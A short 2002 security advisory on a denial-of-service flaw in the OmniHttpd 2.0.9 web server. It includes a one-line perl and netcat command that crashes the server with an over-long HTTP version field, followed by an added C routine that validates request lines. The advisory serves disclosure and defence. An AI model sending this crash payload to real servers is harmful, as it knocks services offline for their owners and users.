Denial of Service in OmniHttpd 2.09
Author: Martin J. Muench
Date: 1 Jul 2002
-[ Product: OmniHttpd
-[ Version: 2.0.9
-[ OS: Windows
-[ Vendor: http://www.omnicron.ca
Summary
OmniHttpd 2.0.9 mishandles the HTTP version field of a request, which causes a denial of service.
Found this problem while writing a new BED plugin.
Problem
When sent a malformed request with an HTTP version containing 4096 or more characters, OmniHttpd crashes.
Example:
perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 192.168.1.8 80
This attack also works with every other request type, such as 'GET', 'POST', etc.
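As an added example (not part of the original advisory and not OmniHttpd's code), the C routine below shows the kind of request-line check that rejects this class of input: the version token is validated by length and format, in place, before anything is copied. The names check_request_line and rl_status and the MAX_REQUEST_LINE limit are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not OmniHttpd code. Limits below are assumptions. */
#define MAX_REQUEST_LINE 8192 /* assumed cap on the whole request line */
#define VERSION_LEN 8         /* strlen("HTTP/1.1") */

enum rl_status { RL_OK, RL_TOO_LONG, RL_MALFORMED, RL_BAD_VERSION };

/* Validate "METHOD SP target SP HTTP/d.d" in place, using lengths only:
 * nothing is copied, so no field length can overrun a fixed buffer.
 * buf need not be NUL-terminated; len is the number of bytes received. */
enum rl_status check_request_line(const char *buf, size_t len)
{
    const char *eol = memchr(buf, '\n', len);
    size_t n = eol ? (size_t)(eol - buf) : len;
    if (n > 0 && buf[n - 1] == '\r')
        n--;
    if (n > MAX_REQUEST_LINE)
        return RL_TOO_LONG;

    const char *sp1 = memchr(buf, ' ', n);      /* end of method */
    if (!sp1 || sp1 == buf)
        return RL_MALFORMED;
    const char *target = sp1 + 1;
    const char *sp2 = memchr(target, ' ', n - (size_t)(target - buf));
    if (!sp2 || sp2 == target)
        return RL_MALFORMED;
    const char *ver = sp2 + 1;
    size_t ver_len = n - (size_t)(ver - buf);

    /* The version token is fixed-size; anything else is rejected. */
    if (ver_len != VERSION_LEN || memcmp(ver, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)ver[5]) || ver[6] != '.' ||
        !isdigit((unsigned char)ver[7]))
        return RL_BAD_VERSION;
    return RL_OK;
}

int main(void)
{
    /* Constructed sample inputs. */
    const char *ok = "HEAD / HTTP/1.0\r\n\r\n";
    const char *bad = "GET /index.html HTTPX1.1\r\n\r\n";
    printf("%d %d\n", check_request_line(ok, strlen(ok)),
           check_request_line(bad, strlen(bad)));
    return 0;
}
```

A server or front-end filter would answer anything other than RL_OK with a 400 response and close the connection.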
Patches
Take a look at the vendor page.